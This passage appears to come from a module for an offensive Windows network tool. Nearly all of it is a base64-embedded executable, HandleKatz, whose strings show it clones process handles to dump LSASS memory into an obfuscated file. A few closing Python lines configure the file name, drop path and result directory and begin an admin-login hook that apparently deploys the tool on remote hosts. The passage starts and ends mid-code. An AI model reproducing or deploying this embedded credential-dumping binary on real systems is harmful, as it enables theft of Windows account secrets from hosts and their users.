2QUVBQUFCSWc4UndSSW5nVzE1QlhNTVBId0QvVXloSWc4UndSSW5nVzE1QlhNT1F1QUVBQUFERGtKQ1FrSkNRa0pDUWtQLy8vLy8vLy8vL0FBQUFBQUFBQUFELy8vLy8vLy8vL3dBQUFBQUFBQUFBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABwf0AAAAAAAAAAAAAAAAAA//////////8AAAAAAAAAAP8AAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAA/////wAAAAAAAAAAAAAAAEAAAADDv///wD8AAAEAAAAAAAAADgAAAAAAAAAAAAAAwBFBAAAAAAAAAAAAAAAAAPB8QAAAAAAAAAAAAAAAAAAQfUAAAAAAACB9QAAAAAAAoH1AAAAAAAAwfUAAAAAAAAB+QAAAAAAAAAAAAAAAAAAQfkAAAAAAAAAAAAAAAAAAIH5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAWypdIFJlY29uIG9ubHk6ICVkCgBbKl0gUGF0aCBkbXA6ICVzCgBbKl0gUGlkIHRvIGNsb25lIGZyb206ICVkCgAAAAAAAAAAWypdIEhhbmRsZUthdHogcmV0dXJuIHZhbHVlOiAlZAoAWypdIEhhbmRsZUthdHogb3V0cHV0OgoKACVzCgAtLXJlY29uAC0tcGlkAC0tb3V0ZmlsZQAAACVzIHstLXJlY29ufSB7LS1waWQ6W3BpZCB0byBjbG9uZSBmcm9tXSAtLW91dGZpbGU6W3BhdGggdG8gb2JmdXNjYXRlZCBkbXBdCgAAAAAAAAAAAAAAAAAAAAAAAAAAAOAZQAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAEBBAAAAAAAIQEEAAAAAAJwQQQAAAAAAQDBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFVua25vd24gZXJyb3IAAABBcmd1bWVudCBkb21haW4gZXJyb3IgKERPTUFJTikAAE92ZXJmbG93IHJhbmdlIGVycm9yIChPVkVSRkxPVykAUGFydGlhbCBsb3NzIG9mIHNpZ25pZmljYW5jZSAoUExPU1MpAAAAAFRvdGFsIGxvc3Mgb2Ygc2lnbmlmaWNhbmNlIChUTE9TUykAAAAAAABUaGUgcmVzdWx0IGlzIHRvbyBzbWFsbCB0byBiZSByZXByZXNlbnRlZCAoVU5ERVJGTE9XKQBBcmd1bWVudCBzaW5ndWxhcml0eSAoU0lHTikAAAAAAAAAX21hdGhlcnIoKTogJXMgaW4gJXMoJWcsICVnKSAgKHJldHZhbD0lZykKAADoOP//nDj//zQ4//+8OP//zDj//9w4//+sOP//TWluZ3ctdzY0IHJ1bnRpbWUgZmFpbHVyZToKAAAAAABBZGRyZXNzICVwIGhhcyBubyBpbWFnZS1zZWN0aW9uACAgVmlydHVhbFF1ZXJ5IGZhaWxlZCBmb3IgJWQgYnl0ZXMgYXQgYWRkcmVzcyAlcAAAAAAAAAAAICBWaXJ0dWFsUHJvdGVjdCBmYWlsZWQgd2l0aCBjb2RlIDB4JXgAACAgVW5rbm93biBwc2V1ZG8gcmVsb2NhdGlvbiBwcm90b2NvbCB2ZXJzaW9uICVkLgoAAAAAAAAAICBVbmtub3duIHBzZXVkbyByZWxvY2F0aW9uIGJpdCBzaXplICVkLgoAAAAAAAAAAAAAAAAAAACwPf//sD3//7A9//+wPf//sD3//xg9//+wPf//4D3//xg9//9DPf//AAAAAAAAAAAobnVsbCkATmFOAEluZgAAKABuAHUAbABsACkAAAAAALJo//+4Yv//uGL//8xo//+4Yv//1Gf//7hi///rZ///uGL//7hi//9gaP//nGj//7hi//9nZv//gGb//7hi//+cZv//uGL//7hi//+4Yv//uGL//7hi//+4Yv//uGL//7hi//+4Yv//uGL//7hi//+4Yv//uGL//7hi//+4Yv//uGL//7xm//+4Yv//9Gb//7hi//8sZ///ZGf//5xn//+4Yv//ImX//7hi//+4Yv//UGb//7hi//+4Yv//uGL//7hi//+4Yv//uGL//+lo//+4Yv//uGL//7hi//+4Yv//MGP//7hi//+4Yv//uGL//7hi//+4Yv//uGL//7hi//+4Yv//qmT//7hi//8nZP//oGP//0pl///gZf//GGb//4Jl//+gY///iGP//7hi//+iZf//wmX//2xk//8wY///4mT//7hi//+4Yv//+2P//4hj//8wY///uGL//7hi//8wY///uGL//4hj//8AAAAASW5maW5pdHkATmFOADAAAAAAAAAAAPg/YUNvY6eH0j+zyGCLKIrGP/t5n1ATRNM/BPp9nRYtlDwyWkdVE0TTPwAAAAAAAPA/AAAAAAAAJEAAAAAAAAAIQAAAAAAAABxAAAAAAAAAFEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAADgPwAAAAAAAAAABQAAABkAAAB9AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADwPwAAAAAAACRAAAAAAAAAWUAAAAAAAECPQAAAAAAAiMNAAAAAAABq+EAAAAAAgIQuQQAAAADQEmNBAAAAAITXl0EAAAAAZc3NQQAAACBfoAJCAAAA6HZIN0IAAACilBptQgAAQOWcMKJCAACQHsS81kIAADQm9WsMQwCA4Dd5w0FDAKDYhVc0dkMAyE5nbcGrQwA9kWDkWOFDQIy1eB2vFURQ7+LW5BpLRJLVTQbP8IBEAAAAAAAAAAC8idiXstKcPDOnqNUj9kk5Paf0
RP0PpTKdl4zPCLpbJUNvrGQoBsgKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIDgN3nDQUMXbgW1tbiTRvX5P+kDTzhNMh0w+Uh3glo8v3N/3U8VdQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALDPQAAAAAAAAAAAAAAAAADAz0AAAAAAAAAAAAAAAAAAUH9AAAAAAAAAAAAAAAAAAIDuQAAAAAAAAAAAAAAAAACA7kAAAAAAAAAAAAAAAAAAAOFAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAADgIkEAAAAAAAAAAAAAAAAACCNBAAAAAAAAAAAAAAAAACAjQQAAAAAAAAAAAAAAAAAwI0EAAAAAAAAAAAAAAAAA8BBBAAAAAAAAAAAAAAAAAFAQQQAAAAAAAAAAAAAAAABYEEEAAAAAAAAAAAAAAAAAIOZAAAAAAAAAAAAAAAAAAAAwQQAAAAAAAAAAAAAAAAAQMEEAAAAAAAAAAAAAAAAAGDBBAAAAAAAAAAAAAAAAADAwQQAAAAAAAAAAAAAAAACgEEEAAAAAAAAAAAAAAAAAYBBBAAAAAAAAAAAAAAAAAOAQQQAAAAAAAAAAAAAAAABgIEAAAAAAAAAAAAAAAAAAgBpAAAAAAAAAAAAAAAAAAIAQQQAAAAAAAAAAAAAAAACwEEEAAAAAAAAAAAAAAAAAcBBBAAAAAAAAAAAAAAAAAJgQQQAAAAAAAAAAAAAAAACUEEEAAAAAAAAAAAAAAAAAkBBBAAAAAAAAAAAAAAAAAEdDQzogKEdOVSkgMTAtd2luMzIgMjAyMDA1MjUAAAAAR0NDOiAoR05VKSAxMC13aW4zMiAyMDIxMDExMAAAAABHQ0M6IChHTlUpIDEwLXdpbjMyIDIwMjEwMTEwAAAAAEdDQzogKEdOVSkgMTAtd2luMzIgMjAyMDA1MjUAAAAAR0NDOiAoR05VKSAxMC13aW4zMiAyMDIwMDUyNQAAAABHQ0M6IChHTlUpIDEwLXdpbjMyIDIwMjAwNTI1AAAAAEdDQzogKEdOVSkgMTAtd2luMzIgMjAyMDA1MjUAAAAAR0NDOiAoR05VKSAxMC13aW4zMiAyMDIwMDUyNQAAAABHQ0M6IChHTlUpIDEwLXdpbjMyIDIwMjAwNTI1AAAAAEdDQzogKEdOVSkgMTAtd2luMzIgMjAyMDA1MjUAAAAAR0NDOiAoR05VKSAxMC13aW4zMiAyMDIwMDUyNQAAAABHQ0M6IChHTlUpIDEwLXdpbjMyIDIwMjAwNTI1AAAAAEdDQzogKEdOVSkgMTAtd2luMzIgMjAyMDA1MjUAAAAAR0NDOiAoR05VKSAxMC13aW4zMiAyMDIwMDUyNQAAAABHQ0M6IChHTlUpIDEwLXdpbjMyIDIwMjAwNTI1AAAAAEdDQzogKEdOVSkgMTAtd2luMzIgMjAyMDA1MjUAAAAAR0NDOiAoR05VKSAxMC13aW4zMiAyMDIwMDUyNQAAAABHQ0M6IChHTlUpIDEwLXdpbjMyIDIwMjAwNTI1AAAAAEdDQzogKEdOVSkgMTAtd2luMzIgMjAyMDA1MjUAAAAAR0NDOiAoR05VKSAxMC13aW4zMiAyMDIwMDUyNQAAAABHQ0M6IChHTlUpIDEwLXdpbjMyIDIwMjAwNTI1AAAAAEdDQzogKEdOVSkgMTAtd2luMzIgMjAyMDA1MjUAAAAAR0NDOiAoR05VKSAxMC13aW4zMiAyMDIwMDUyNQAAAABHQ0M6IChHTlUpIDEwLXdpbjMyIDIwMjEwMTEwAAAAAEdDQzogKEdOVSkgMTAtd2luMzIgMjAyMDA1MjUAAAAAR0NDOiAoR05VKSAxMC13aW4zMiAyMDIwMDUyNQAAAABHQ0M6IChHTlUpIDEwLXdpbjMyIDIwMjAwNTI1AAAAAEdDQzogKEdOVSkgMTAtd2luMzIgMjAyMDA1MjUAAAAAR0NDOiAoR05VKSAxMC13
aW4zMiAyMDIwMDUyNQAAAABHQ0M6IChHTlUpIDEwLXdpbjMyIDIwMjAwNTI1AAAAAEdDQzogKEdOVSkgMTAtd2luMzIgMjAyMDA1MjUAAAAAR0NDOiAoR05VKSAxMC13aW4zMiAyMDIwMDUyNQAAAABHQ0M6IChHTlUpIDEwLXdpbjMyIDIwMjAwNTI1AAAAAEdDQzogKEdOVSkgMTAtd2luMzIgMjAyMDA1MjUAAAAAR0NDOiAoR05VKSAxMC13aW4zMiAyMDIwMDUyNQAAAABHQ0M6IChHTlUpIDEwLXdpbjMyIDIwMjAwNTI1AAAAAEdDQzogKEdOVSkgMTAtd2luMzIgMjAyMDA1MjUAAAAAR0NDOiAoR05VKSAxMC13aW4zMiAyMDIwMDUyNQAAAABHQ0M6IChHTlUpIDEwLXdpbjMyIDIwMjAwNTI1AAAAAEdDQzogKEdOVSkgMTAtd2luMzIgMjAyMDA1MjUAAAAAR0NDOiAoR05VKSAxMC13aW4zMiAyMDIwMDUyNQAAAABHQ0M6IChHTlUpIDEwLXdpbjMyIDIwMjEwMTEwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAABEAAAAAABABAQAAA+EQAABAABAEARAACJEQAADAABAJARAAC2FAAAFAABAMAUAADdFAAAKAABAOAUAAD9FAAASAABAAAVAAAZFQAAaAABACAVAAAsFQAAcAABADAVAAAxFQAAdAABAEAVAAA/FwAAhAABAD8XAAB9GAAAkAABAH0YAACqGAAAnAABAMAYAAD6GAAAqAABAAAZAABqGQAAsAABAHAZAACPGQAAvAABAJAZAACXGQAAwAABAKAZAACjGQAAxAABALAZAADfGQAAyAABAOAZAABhGgAA0AABAHAaAABzGgAA3AABAIAaAAB4GwAA4AABAIAbAACDGwAA+AABAJAbAAD6GwAA/AABAAAcAABiHQAACAEBAHAdAAD+HwAAFAEBAAAgAABBIAAALAEBAFAgAABcIAAANAEBAGAgAAAaIgAAOAEBACAiAACLIgAAQAEBAJAiAAAIIwAAUAEBABAjAACZIwAAXAEBAKAjAACCJAAAZAEBAJAkAAC8JAAAbAEBAMAkAAAPJQAAcAEBABAlAACvJQAAdAEBALAlAAAoJgAAgAEBADAmAABpJgAAhAEBAHAmAADbJgAAiAEBAOAmAAAWJwAAjAEBACAnAACnJwAAkAEBALAnAABuKAAAlAEBALAoAAD3KAAAmAEBAAApAAATKgAApAEBACAqAAB3KgAArAEBAIAqAADYKwAAtAEBAOArAAAQLQAAyAEBABAtAABXLQAA1AEBAGAtAAANLgAA4AEBABAuAAAvMwAA6AEBADAzAADcNgAAAAIBAOA2AABAOAAAGAIBAEA4AADxOwAALAIBAAA8AADgPAAAPAIBAOA8AACQPQAASAIBAJA9AAB4PgAAVAIBAIA+AADwPwAAYAIBAPA/AAA7RQAAbAIB
AEBFAADnTgAAgAIBAPBOAAAnTwAAmAIBADBPAACsTwAAoAIBALBPAADMTwAArAIBANBPAABGUQAAsAIBAFBRAAAQaAAAyAIBABBoAAAFaQAA5AIBABBpAABTaQAA9AIBAGBpAAA8agAA+AIBAEBqAACCagAABAMBAJBqAACCawAADAMBAJBrAAD0awAAGAMBAABsAACtbAAAIAMBALBsAABtbQAAMAMBAHBtAADJbgAAOAMBANBuAADQcAAAUAMBANBwAADecQAAZAMBAOBxAAAwcgAAeAMBADByAAD1cwAAfAMBAAB0AAAYdQAAjAMBACB1AAApdgAAlAMBADB2AABadgAAoAMBAGB2AACIdgAApAMBAJB2AAC3dgAAqAMBALB3AAAteQAArAMBADB5AACYeQAAuAMBAKB5AAClegAAyAMBALB6AAAKewAA3AMBABB7AACZewAA7AMBAKB7AADhewAA9AMBAPB7AADmfAAAAAQBAPB8AAAPfQAAFAQBABB9AAAYfQAAHAQBACB9AAArfQAAIAQBADB9AACXfQAAJAQBAKB9AAAAfgAALAQBAAB+AAALfgAANAQBABB+AAAbfgAAOAQBACB+AAArfgAAPAQBAOB+AAA0fwAAeAABAEB/AABFfwAAQAQBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAABBAEABEIAAAEEAQAEYgAAAQ8IAA8BEwAIMAdgBnAFUATAAtAJBAEABEIAAKh3AAABAAAAxBQAANcUAABgIAAA1xQAAAkEAQAEQgAAqHcAAAEAAADkFAAA9xQAAGAgAAD3FAAAAQQBAARCAAABAAAAAQAAAAEOBIUOAwZiAjABUAEIAwUI0gQDAVAAAAEIAwUIUgQDAVAAAAEIAwUIMgQDAVAAAAEEAQAEQgAAAQYDAAZCAjABYAAAAQAAAAEAAAABAAAAAQQBAARCAAABBgMABkICMAFgAAABAAAAARYJABaIBgAQeAUAC2gEAAbiAjABYAAAAQAAAAEHAwAHYgMwAsAAAAEIBAAIkgQwA2ACwAEYCoUYAxBiDDALYApwCcAH0AXgA/ABUAEEAQAEogAAAQAAAAEGAgAGMgLAAQkFAAlCBTAEYANwAsAAAAEHBAAHMgMwAmABcAEFAgAFMgEwAQUCAAUyATABAAAAAQAAAAEIBAAIMgQwA2ACwAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAEJBAAJUgUwBMAC0AEEAQAEogAAAQUCAAUyATABDggADnIKMAlgCHAHUAbABNAC4AEHBAAHMgMwAmABcAEHAwAHQgMwAsAAAAEEAQAEYgAAARgKhRgDEGIMMAtgCnAJwAfQBeAD8AFQARgKhRgDEEIMMAtgCnAJwAfQBeAD8AFQAQ0HBQ1SCQMGMAVgBHADwAFQAAABCAUACEIEMANgAnABUAAAAQkEAAkyBTAEwALQAQcDAAfCAzACwAAAAQcDAAfCAzACwAAAAQgEAAiyBDADYALAAQwHAAyiCDAHYAZwBVAEwALQAAABEwoAEwEV
AAwwC2AKcAlQCMAG0ATgAvABBQIABTIBMAEHBAAHMgMwAmABcAEAAAABEAkAEGIMMAtgCnAJUAjABtAE4ALwAAABGwwAG2gKABMBFwAMMAtgCnAJUAjABtAE4ALwAQYFAAYwBWAEcANQAsAAAAEAAAABBgMABkICMAFgAAABBQIABTIBMAEGAwAGYgIwAWAAAAEGAgAGMgLAAQoFAApCBjAFYATAAtAAAAEFAgAFUgEwARAJABBCDDALYApwCVAIwAbQBOAC8AAAAQ4IAA4yCjAJYAhwB1AGwATQAuABDggADjIKMAlgCHAHUAbABNAC4AEAAAABCgYACjIGMAVgBHADUALAAQMCAAMwAsABBwQABzIDMAJgAXABAAAAAQAAAAEAAAABBgMABoICMAFwAAABCwYAC3IHMAZgBXAEwALQAQ4IAA5yCjAJYAhwB1AGwATQAuABCQUACYIFMARgA3ACwAAAAQQBAASiAAABCAQACFIEMANgAsABDggADlIKMAlgCHAHUAbABNAC4AEFAgAFMgEwAQAAAAEAAAABBQIABTIBMAEFAgAFMgEwAQAAAAEAAAABAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAgAQAAAAAAAAAAACgnAQAoIgEAYCABAAAAAAAAAAAAdCcBADgiAQDoIAEAAAAAAAAAAAAgKAEAwCIBAAAAAAAAAAAAAAAAAAAAAAAAAAAAACQBAAAAAAAAAAAAAAAAABgkAQAAAAAAMCQBAAAAAABIJAEAAAAAAFgkAQAAAAAAaiQBAAAAAACGJAEAAAAAAJokAQAAAAAAsiQBAAAAAADIJAEAAAAAAOYkAQAAAAAA7iQBAAAAAAD8JAEAAAAAAAwlAQAAAAAAHiUBAAAAAAAuJQEAAAAAAEQlAQAAAAAAAAAAAAAAAABQJQEAAAAAAGglAQAAAAAAfiUBAAAAAACUJQEAAAAAAKQlAQAAAAAAsCUBAAAAAAC+JQEAAAAAAM4lAQAAAAAA4CUBAAAAAAD0JQEAAAAAAP4lAQAAAAAADCYBAAAAAAAWJgEAAAAAACImAQAAAAAALCYBAAAAAAA2JgEAAAAAAEImAQAAAAAASiYBAAAAAABUJgEAAAAAAF4mAQAAAAAAZiYBAAAAAABuJgEAAAAAAHgmAQAAAAAAgCYBAAAAAACKJgEAAAAAAJImAQAAAAAAmiYBAAAAAACkJgEAAAAAALImAQAAAAAAvCYBAAAAAADGJgEAAAAAANAmAQAAAAAA2iYBAAAAAADkJgEAAAAAAPAmAQAAAAAA+iYBAAAAAAAEJwEAAAAAAA4nAQAAAAAAGicBAAAAAAAAAAAAAAAAAAAkAQAAAAAAAAAAAAAAAAAYJAEAAAAAADAkAQAAAAAASCQBAAAAAABYJAEAAAAAAGokAQAAAAAAhiQB
AAAAAACaJAEAAAAAALIkAQAAAAAAyCQBAAAAAADmJAEAAAAAAO4kAQAAAAAA/CQBAAAAAAAMJQEAAAAAAB4lAQAAAAAALiUBAAAAAABEJQEAAAAAAAAAAAAAAAAAUCUBAAAAAABoJQEAAAAAAH4lAQAAAAAAlCUBAAAAAACkJQEAAAAAALAlAQAAAAAAviUBAAAAAADOJQEAAAAAAOAlAQAAAAAA9CUBAAAAAAD+JQEAAAAAAAwmAQAAAAAAFiYBAAAAAAAiJgEAAAAAACwmAQAAAAAANiYBAAAAAABCJgEAAAAAAEomAQAAAAAAVCYBAAAAAABeJgEAAAAAAGYmAQAAAAAAbiYBAAAAAAB4JgEAAAAAAIAmAQAAAAAAiiYBAAAAAACSJgEAAAAAAJomAQAAAAAApCYBAAAAAACyJgEAAAAAALwmAQAAAAAAxiYBAAAAAADQJgEAAAAAANomAQAAAAAA5CYBAAAAAADwJgEAAAAAAPomAQAAAAAABCcBAAAAAAAOJwEAAAAAABonAQAAAAAAAAAAAAAAAADkAENyeXB0U3RyaW5nVG9CaW5hcnlBAAAbAURlbGV0ZUNyaXRpY2FsU2VjdGlvbgA/AUVudGVyQ3JpdGljYWxTZWN0aW9uAAB2AkdldExhc3RFcnJvcgAA5wJHZXRTdGFydHVwSW5mb0EAfANJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9uAJcDSXNEQkNTTGVhZEJ5dGVFeAAA2ANMZWF2ZUNyaXRpY2FsU2VjdGlvbgAADARNdWx0aUJ5dGVUb1dpZGVDaGFyAHIFU2V0VW5oYW5kbGVkRXhjZXB0aW9uRmlsdGVyAIIFU2xlZXAApQVUbHNHZXRWYWx1ZQDOBVZpcnR1YWxBbGxvYwAA1AVWaXJ0dWFsUHJvdGVjdAAA1gVWaXJ0dWFsUXVlcnkAAAsGV2lkZUNoYXJUb011bHRpQnl0ZQBLBmxzdHJsZW5BAAA4AF9fQ19zcGVjaWZpY19oYW5kbGVyAABAAF9fX2xjX2NvZGVwYWdlX2Z1bmMAQwBfX19tYl9jdXJfbWF4X2Z1bmMAAFIAX19nZXRtYWluYXJncwBTAF9faW5pdGVudgBUAF9faW9iX2Z1bmMAAFsAX19sY29udl9pbml0AABhAF9fc2V0X2FwcF90eXBlAABjAF9fc2V0dXNlcm1hdGhlcnIAAHIAX2FjbWRsbgB5AF9hbXNnX2V4aXQAAIsAX2NleGl0AACXAF9jb21tb2RlAAC+AF9lcnJubwAA3ABfZm1vZGUAAB0BX2luaXR0ZXJtAIMBX2xvY2sAKQJfb25leGl0AMoCX3VubG9jawCKA2Fib3J0AJcDYXRvaQAAmwNjYWxsb2MAAKgDZXhpdAAAvANmcHJpbnRmAL4DZnB1dGMAwwNmcmVlAADQA2Z3cml0ZQAA+QNsb2NhbGVjb252AAD/A21hbGxvYwAABwRtZW1jcHkAAAkEbWVtc2V0AAAnBHNpZ25hbAAANgRzdHJjaHIAADwEc3RyZXJyb3IAAD4Ec3RybGVuAABBBHN0cm5jbXAARwRzdHJzdHIAAGMEdmZwcmludGYAAH0Ed2NzbGVuAAAAIAEAQ1JZUFQzMi5kbGwAFCABABQgAQAUIAEAFCABABQgAQAUIAEAFCABABQgAQAUIAEAFCABABQgAQAUIAEAFCABABQgAQAUIAEAFCABAEtFUk5FTDMyLmRsbAAAAAAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQBtc3ZjcnQuZGxsAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEARQAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQQAAAAAAAkBlAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4BlAAAAAAACwGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
self.handlekatz = "handlekatz.exe"
self.handlekatz_path = "/tmp/shared/"
self.dir_result = self.handlekatz_path
self.useembeded = True
if 'HANDLEKATZ_PATH' in module_options:
self.handlekatz_path = module_options['HANDLEKATZ_PATH']
self.useembeded = False
if 'HANDLEKATZ_EXE_NAME' in module_options:
self.handlekatz = module_options['HANDLEKATZ_EXE_NAME']
self.useembeded = False
if 'TMP_DIR' in module_options:
self.tmp_dir = module_options['TMP_DIR']
if 'DIR_RESULT' in module_options:
self.dir_result = module_options['DIR_RESULT']
def on_admin_login(self, context, connection):
